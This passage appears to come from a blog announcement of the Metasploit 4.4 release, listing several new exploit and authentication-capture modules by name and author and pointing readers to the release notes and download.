- Sielco Sistemi Winlog Remote File Access by Luigi Auriemma and juan exploits BID-54212
- Authentication Capture: DRDA (DB2, Informix, Derby) by Patrik Karlsson
- Authentication Capture: MSSQL by Patrik Karlsson
- Authentication Capture: VNC by Patrik Karlsson
- ALLMediaServer 0.8 Buffer Overflow by juan vazquez, modpr0be and motaz reda exploits EDB-19625

Please refer to the release notes for a full list of all new modules since version 4.3.

Metasploit 4.4 is Waiting For You

If you'd like to see more details on what's in the new release, please read Tod Beardsley's most excellent release notes. If you're already drooling to get the new release, you can download Metasploit now.
